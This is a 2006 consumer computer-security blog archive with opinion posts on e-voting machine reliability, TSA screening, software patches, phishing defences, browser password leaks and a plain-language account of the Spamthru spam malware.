Thursday, November 30, 2006

National Institute of Standards and Technology weighs in on e-voting 

The NIST used to be the National Bureau of Standards. They generally have a profound understanding of what they're talking about.

They are about to recommend decertifying direct recording (DRE) voting machines. Their objection is just what people have been pointing out all along: there's no way to audit or recount.

UPDATE 12/5:

And the government has rejected the NIST advice.

UPDATE 12/7:

An illogical compromise did pass, which says that all newly purchased voting machines have to be auditable but there's no need to replace the ones that are too dangerous to use. Here's a good analysis of the NIST voting machine decision.


Wednesday, November 29, 2006

Feeling safer yet? 

The TSA is confiscating pumpkin pies. So we must really be safe, right?

Earlier this year a man on a flight from Dallas-Fort Worth to Los Angeles brought a four-foot-long sword onto the airplane. Fellow passengers noticed when he had to get help from a flight attendant getting it into the overhead compartment.

Now, if one of the good guys is armed, the plane is actually safer ("You call that a knife? That's a box cutter. (Drawing sword) THIS is a knife!"). Still, that's not something you want flying around in turbulence, and any screener who could miss it...

The TSA has started action in response to the reports that Newark screeners missed 20 of 22 dangerous objects in field tests. What kind of action? I might have tried retraining, studying the break schedule to see if it is enough to let people stay alert, investigating new equipment and so on. But then, I'm a security professional. The TSA is taking action to track down the person who leaked the test results to the press. An entire investigation team went to Newark to identify the leaker. Employees were warned that jail time is a possibility.

In case you've forgotten, Newark was the originating airport for Flight 93.


Your Mac will ask to update. Let it. 

Apple's released a large package of security fixes, including the one for the .DMG-related bug I mentioned earlier. Some of them are pretty important and hard to defend against, so you definitely want the upgrade.


Tuesday, November 28, 2006

Antivirus: free, or paid? 

There are a few free antivirus packages. They're usually not the absolute best, but often beat the performance of some of the famous commercial offerings.

That's the way it turned out when a Watchguard reader submitted an infected file to a web site, VirusTotal, which hosts 27 virus scanners and applies them all to the file you upload. One commercial product, which has been resting on its marketing budget for years while professionals gradually gave up on it, completely failed. The commercial product I use on my own machine, "Nod32", caught it just fine. And so did ClamAV, a free program from the Linux world!


"About three in four US online adults (74 percent) have not installed a hardware firewall" 

PC World reports on a survey sponsored by security firm Checkpoint, according to which most people are still neglecting basic precautions.

The numbers don't feel right. If you run without a firewall, any version of Windows before XP Service Pack 2 has already been taken over, within the first hour after you plugged it in. There must be a lot of people who said "no" to the firewall question who simply don't know that their cable modem has firewall features built in.

The article continues with a list of obvious precautions like knowing who you're sending money to.


Feeling safer yet? Now it's pumpkin pie. 

The Cleveland Plain Dealer reports that the airport is confiscating pumpkin pies.

Now I'd really like to give the security people the benefit of the doubt and assume they've heard about some threat we haven't, like some dangerous substance that looks like pie filling.

So what are they doing with these terrorists's tools, too volatile and dangerous to be allowed on airplanes? They're feeding them to our troops at the USO.


Tuesday, November 21, 2006

Feeling safer yet? 

An airline employee had a hobby: he wrapped rubber bands into a rubber band ball. Unfortunately he put it in his carryon luggage. It showed up in a hand search.

It's unclear why the authorities were so afraid of a rubber band ball. Clearly they were petrified: even after he offered to surrender it to them, they still arested him and put him in jail.

UPDATE 11/22:

A woman was traveling with frozen homemade tomato sauce. The TSA screener, mindful of the complexities of the situation, called in a supervisor to help. Was frozen tomato sauce a dangerous liquid or not? The supervisor sagely observed "It's not a liquid right now, but it will be soon."

There's profiling, and there's lunacy. Six imams were removed from a plane and searched by bomb-sniffing dogs, were found not to be dangerous, but US Airways refused to sell them a ticket on another flight. If they were safe enough to get on another airline, why weren't they safe enough for US Airways? Well, it all traces back to the reason other passengers complained about them.

They were praying.

Those six were the exact sort of people we need on our side, to turn in potential terrorists and to call their flocks to personal virtue. I hope they are the forgiving sort.


Bookmark your bank and broker 

There's software now that supposed to help protect you against web sites that impersonate your bank or broker and try to steal passwords and accoutn numbers. It comes in the form of toolbars for your web browser, from many suppliers with many different approaches. How well do they work?

Carnegie Mellon researchers tested anti-phishing toolbars
in a recent study. The reuslts are not encouraging.
"[the best products]still missed more than 15% of fraudulent sites. The other four toolbars we tested could correctly identify less than half the fraudulent sites, and one did not correctly identify any fraudulent sites."

Software is doing you some good if it cuts the number of undetected attacks by a factor of 6. But there's an easier way that's more reliable, and the free toolbars come with a high price.

Simply bookmark the places that need high-value passwords and always use the bookmark to go there. Even easier, you may be able to put a link in your browser's navigation bar. Don't follow links from email even if they look right. That will protect you against all but a tiny minority of forgeries.

The price of the free toolbars is that, in the case of those I'm familiar with, they check the URL you're visiting by sending it to a central machine that compares it against a list of known crooked sites. That's right: the company providing the toolbar knows whether you're going to


How secure is your Mac, really? 

I just read a 29-page paper from antivrus firm Symantec about OS X security.

There are only a couple of points that matter to a home user. First, use an external firewall box, or at least turn on the system's firewall (off by default, for some reason, and not as good as an external box).

The other good point they made is that Mac users have gotten so used to installing cool software from random places that they may not be suspicious enough when bad guys begin to target them.

Apple is missing a few clever tricks that could make the innards of a system into barren ground for attackers. Right now Microsoft is ahead of them on that front.

UPDATE 11/22:

In fact, a bad security problem just got announced. It's possible for bad guys to create a damaged .DMG file which can take over your computer completely if you open it. And Safari will open it for you automatically. So, think twice about the trustworthiness of the places you download from, and for the moment turn off Safari's option to automatically open "safe" files.

UPDATE 12/1:

Or maybe not. Another researcher spent three days looking at the report and analyzing what the Mac was doing with the damaged .DMG. It's complicated, but the upshot seems to be that the operating system will complain bitterly, stop working, but not run off the rails in any security-related way.


Heads up, folks, this one is serious 

If your web browser offers to "remember" passwords for you, it can also leak them to places on the web that you didn't intend.

This was first noticed in Firefox, and I gather it's possible but more difficult in Internet Explorer.

Bad guys can build web pages (and they already are) that request your username and password for the site you're on and then send it to another site. For several reasons, you're most likely to be attacked on a place that allows user-contributed content, for example MySpace.

Right now it's hard to defend yourself. There's no software patch yet to fix the vulnerability. The best advice anyone has is not to save passwords in your browser.

Details for your technical friends


Monday, November 20, 2006

Legalized computer intrusion? 

Congress is considering legislation to allow vigilantes to attack other people's computers.

Is this to allow shutting down spammers? To strike back at computer criminals?

No, it's to give studios and record labels the power to crack security on file sharing services.

the measure would permit copyright holders to perform nearly unchecked electronic hacking if they have a "reasonable basis" to believe that piracy is taking place.

This is wrong in every way I can think of.

Either you have rule of law or you don't. This bill would put copyright holders above the law. The legislation would immunize groups such as the Motion Picture Association of America and the Recording Industry Association of America from all state and federal laws if they disable, block or otherwise impair a "publicly accessible peer-to-peer network." The voice messaging system Skype is peer to peer; you can send files to chat partners; will the RIAA try to destroy it?

There will certainly be innocent victims. Under the law, the innocent victims wouldn't have meaningful legal recourse.

File sharing systems distribute free software with the permission of the volunteers who write the software. Under this law, a studio could destroy the legitimate uses if there were also people downloading music without authorization.

If there's no effective legal recourse, then there's nothing except the conscience of the record company executives to stop them from attacking anyone they choose, "pirate" or not.

It's real easy to hit bystanders with some of the attack tools out there.

If you're in the districts of Howard Berman, D-CA, or Howard Coble, R-NC, this is the kind of representation you're getting.


Friday, November 17, 2006

What happens when bad software gets on your computer? 

Have you ever seen the movie "Risky Business"? Bad software invites its friends over, starts illegal businesses in your computer, and generally makes your life miserable.

Let's take a look at a particular piece of malware, one that's in the news because it's responsible for the recent sudden upsurge in spam. As usual everyone's given it a different name, but the most common is "Spamthru".

It all starts when you run software from a source you don't know and trust. Maybe it's just a small program that goes out on the Internet to download and run the latest, freshest, copy of a large program that does bad things, in this case Spamthru.

Spamthru changes your Windows setup to ensure that it runs on startup. It uses several ways of doing that, including one or two that I'd never heard of.

Then it installs and runs an antivirus program. "What?!", you say. It's like the bread mold that secretes penicillin to kill off its competitors. Spamthru is trying to make sure it doesn't get slowed down by all the other malicious software on your Windows machine.

Some malware tries to shut down your own antivirus software or at least make it impossible for you to update it. Spamthru does the latter.

Then it listens for orders from the humans who control it. The whole point of this was to take control of your computer. In the old days (like a year or two ago), a program like Spamthru would log in to a chat room and wait for its human master to type in commands. Spamthru instead uses a clever distributed command and control system that will keep on working even if law enforcement or responsible ISPs shut down a server or two.

The orders it can understand and obey include "update yourself", and the big ones: "get a template for a spam message and a list of victims" and "send out spam". That's where they make their money. The criminals who caused this whole problem rent out use of the 70,000 personal computers they control to spammers. It does a hideously good job. It adds random elements to the spam to confuse spam filters. It sends the meat of the spam as a picture, which is hard for filters to read, and it randomizes the size of the picture and adds a few random dots to it so that filters can't just learn to block a particular image.

Do you still want to take a chance on installing software from random strangers?

Joe Stewart's technical analysis of Spamthru


Thursday, November 16, 2006

One very good sentence about computer security 

A column of security advice from the Wall Street Journal's Walter Mossberg says something insightful about all those email ads for drugs and other questionable goodies. He writes "Treat such come-ons the way you'd treat a stranger in a bad neighborhood who made such promises".

Bingo. Because that is exactly what's happening. The world of spam is a bad neighborhood.

All the rest of his advice is sound, but that one sentence is excellent.


Wednesday, November 15, 2006

Happy Patchday 

Don't put off running Windows Update today. Some of the security problems it fixes are critical, and worse yet there are already programs bad guys can use to attack through those culnerabilities.


Tuesday, November 14, 2006

It's hard to tell if email is impersonating your bank 

The perpetrators of phishing scams, who pretend to be your bank and try to trick you into giving them passwords, have been getting slicker over time. They look more and more plausible.

Meanwhile banks have been getting sloppier. Citibank sent a mass mailing that looked a lot like a phishing scam.


Sunday, November 12, 2006

A different kind of wireless security problem 

We knew about the risk of eavesdropping. This new problem is different and worse.

There's software, a "driver", that makes your wireless card work. This software runs with high privileges, in the sensitive innards of your operating system. What if it has a bug, a security bug which allows someone to take it over? Then you've lost control of your machine. That would be even worse than the usual ways of getting infected because it would require absolutely no action on your part, just having your wireless system turned on within range of somebody malicious.

Broadcom, who makes the inner working of WiFi cards from several different name brands, put such a bug into their driver software. If your card says "Linksys", there's a patch. If it's from somebody else, you're stuck phoning the support line for your equipment and arguing with people who won't know what you're talking about: "Broadcom, in Irvine, Calif., has released a fixed driver to partners, but the availability of fixes for end-users appear to be very limited."

Hype or Horror?

There are two bits of good news in this. One is that there's no evidence that bad guys are actually attacking through this security hole (yet). The other is that it's not the kind of attack that pays big money for them. They could only infect a few computers at a time, or at most several dozen, with an attack like this. They could get tens of thousands of zombie computers under their control by using an Internet-based attack.

Details for your technical friends: The SANS report listing affected versions and files and The original security bug report about the Broadcom equipment.

UPDATE 11/15:

You're taken care of if you own a Dell. Glenn Fleishman's Wi-Fi Net News (read it if you have any interest in the industry) reports that Dell has released a patch for their computers.

UPDATE 11/22:

It's not your imagination. News like this does come in waves. What happens is that security people who hear about a new category of problem turn their attention to finding new examples. That's why we've now found out about similar vulnerabilities in wireless equipment from D-Link and from Netgear. For links to patches, I'll refer you to someone I respect who's already put the list together, Roger Grimes.


Thursday, November 09, 2006

"Experts remain at odds over e-voting" 

That's the headline in the Chronicle of Higher Education about e-voting.

I snapped to attention. I wanted to learn from the thoughts of anyone who had a positive opinion of voting machines and who was an expert in auditing, IT systems design, user interface design, IT operations, or computer security.

So I zeroed in on who the experts were.

Says the article, "a group of political-science professors".


Voting machines: how do the alternatives work? 

There's a good Fortune article about the history and status of voting machines with a really good (not perfect, but good) comparison chart of what you need to worry about with different kinds of technology.

They understate the problems with all-electronic systems. There are lots of ways to cheat besides what they mention, including simply editing the results at the central machine that adds up the precinct results. Yes, the operator can change the totals, a feature which pushes the limits of what you can explain as simple designer incompetence.

They overstate the problems with paper. "Difficult and time-consuming to count in large quantities"? Have each precinct report its own results, all of them counting at the same time. The big problems with paper are ambiguous and "spoiled" ballots.


Wednesday, November 08, 2006

How did the voting machines work? 

It was a mixed bag yesterday, and at first glance looks more like breakdowns than like election stealing.

The most alarming reports were of "vote flipping", machines registering a vote different from what the voter intended. That was happening on touch screen machines. It's possible that the machines simply lost track of which touch went with which part of the ballot -- they can fail that way -- but nobody knows for sure. Computer science prof and founder of, David Dill, says "It could be a calibration problem with the touchscreens, but I'm not sure that anyone really knows yet because no one's looked at it. My answer as a computer scientist is that I want facts". It sure would be a dumb way to try to steal an election.

Take a close look at the review screen if you vote on one of those machines.

And inevitably, the machine vendors blame the voters: "Michelle Shafer, a spokeswoman at e-voting machine vendor Sequoia Voting Systems, said the perceived problem of vote flipping is definitely human error". Diebold spokesman David Bear goes even further: "'It's not a problem,' Bear said. "It doesn't exist.'"

Less alarmingly, there were plenty of mechanical breakdowns that forced the polls ot stay open late in several places. Colorado had people waiting in line for two hours. "In Campbell County, Ky., an e-voting machine began smoking soon after polls opened at 6 a.m., said Les Fugate, spokesman for Kentucky Secretary of State Trey Grayson. "That one truly malfunctioned, and it just smoked and was pulled" out of service, he said. The eSlate touchscreen machine from Hart InterCivic Inc. in Austin had been used without incident in the May primary when it was brand new, he said." Where this got bad is in places where voters went away before they had a chance to vote.

The terrible problem, which may keep the elections from convincing voters that the outcome was fair, is that there's no way to recount the purely electronic machines. The Virginia Senate race ended with a difference of 7,000 votes out of 2.3 million.

The most interesting thing is that the party in power lost bigtime, which wouldn't have happened if there had been widespread rigging of the machines. One theory about why tampering didn't happen: "This year's scrutiny by the media, which detailed the potential problems with e-voting, may have headed off any attempted hackings that could have flipped the results of a major race, said Bruce Funk, the former elections director for Emery County, Utah, and an outspoken critic of touch-screen systems". The price of freedom is eternal vigilance...

I remain opposed to computerized voting machines, as does every security professional I've heard from on the subject.

UPDATE 11/10:

This one isn't just a "glitch". Sarasota County, Florida, is missing 18,000 votes in the tight race for the 13th District House seat. The current margin is 368 votes. The missing 18,000, one out of every seven ballots cast, are cases where someone cast a ballot but somehow nothing registered for the House race, just for the other items on the ballot.

The voting machine vendor denies everything:
"However, we have been in contact with the supervisor of elections, who has emphasized that the voting equipment functioned well," ES&S said. "The touch-screen system used in Sarasota County provides unlimited opportunity for a voter to make and change selections before a ballot is cast. Therefore, according to the supervisor of elections, under-votes were a result of an intentional choice not to make a selection in the congressional race or unintentional omission of a selection."

Personal opinion: this is almost certainly a bug of some sort. Actual cheating could and would be much harder to detect.

An opinionated piece by an opinionated man argues that the problems were severe and pervasive, and points to the VotersUnite! database of e-voting problem reports. Brad isn't willing to tolerate the headaches we take for granted with new computer systems, not in a critical application like voting: "It is not yet a felony in the United States of America to turn a legally registered voter away from the polls without allowing him to cast a vote. But it damned well should be", he writes.

UPDATE 11/23

In the Florida election where 18,000 votes just disappeared from one county and not from others, it turns out that the county was friendly to the candidate who allegedly lost by less than 400 votes. Do the arithmetic: if she had been getting as few as 53% of the missing votes she would have won. This is America, so she's suing demanding a revote.


So, what's a "trustworthy" web site anyway? 

The people who run a high-profile site like aren't going to booby-trap it with spyware. But what about high-profile, well-respected sites that allow users to contribute?

They fixed the problem really fast, but on Wikipedia some crook changed the article about the Blaster worm to include a link, supposedly to a patch, but actually to a piece of malicious software.

Trustworthy, these days, means not just being well known and respectable but also means being willing and (the hard part) able to prevent or at least detect and remove malicious material in user comments, uploaded articles and videos, and so on.

Antivirus and staying up to date on security patches will protect you from a lot of things.


Sunday, November 05, 2006

"Extremely crtical" security bug for Windows users 

The Microsoft security bulletin says that it affects just about every version of Windows. This is another bug in which using Internet Explorer to look at the wrong web site will let the bad guys take over your computer. Bad guys are already attacking through this security hole.

IE7 is affected.

Until Microsoft releases a patch, it looks like turning off Active Scripting would protect you at the cost of making a lot of web sites stop working right for you. Really, you should continue runing Firefox as your default web browser until you're running IE 7 on Vista and it's had some time to prove itself.


Friday, November 03, 2006

Great piece about how to size up risks 

Executive summary: humans are lousy at figuring out what's more dangerous and more worthy of protective efforts.

My favorite security guru, Bruce Schneier, quotes Harvard psychology professor Daniel Gilbert about disk perception.

The most important point for computer security is the first one, "We over-react to intentional actions, and under-react to accidents, abstract events, and natural phenomena". Whether you lose all your files to a system crash or to a destructive program, you're just as hurt and need to do the same things to recover (hint: do you have recent backups?). Destructive viruses are rare these days and system crashes are all too common. I advise my clients to prepare for natural disasters before they prepare for terrorist attacks.


Thursday, November 02, 2006

HBO e-voting documentary tonight 

The title is "Hacking Democracy", and voting machine vendor Diebold has demanded that HBO not show it.
It got an unfavorable review from the Washington Post.
If you missed it, the progrma is available at Google Video.


Beware of people reaching for the back of the voting machine 

Some voting machines have a yellow button in back that lets you repeat votes.

Words fail me. I can actually see ways this could have happened accidentally but all of them seem breathtakingly stupid.


I've talked about coffee shop WiFi 

Would you like to see examples of what can happen if you're on a network where everyone can see everyone else's traffic?

Older cable modem systems were like party lines where everyone's traffic was mixed together. Here's an article about how you can see other people's passwords on a cable modem. WiFi networks have the same problem.

The article's got more technical detail than you probably want but the main point is that too many places that ask for your password don't arrange to scramble it as it goes over the wire or over the air. If they did you'd be safer.


Is the Mac more secure? 

You won't find an answer here, but it does have a set of securty and privacy features that Windows is only just catching up with.

Privacy author Simson Garfinkel has an article about what Mac OS X security features can do for you.


Internet Explorer 7 is now an automatic update 

This is boring, isn't it? You've got a lot more going on in your life than watching for new revisions of a web browser.

This one may improve your computer security quite a bit. It's too early to tell, but I've looked over the kinds of work Microsoft has done and it all makes sense and the changes are close to what I would have prescribed to make Internet Explorer less dangerous.

If you regularly visit places where Firefox doesn't work well, I recommend giving IE7 a try. To see what Microsoft says and download it if you don't want to wait for the automatic update, see the IE7 introduction page.

UPDATE 11/3:

If you have any of the surprises that tend to follow upgrades, here's a guide to troubleshooting IE7.


This page is powered by Blogger. Isn't yours?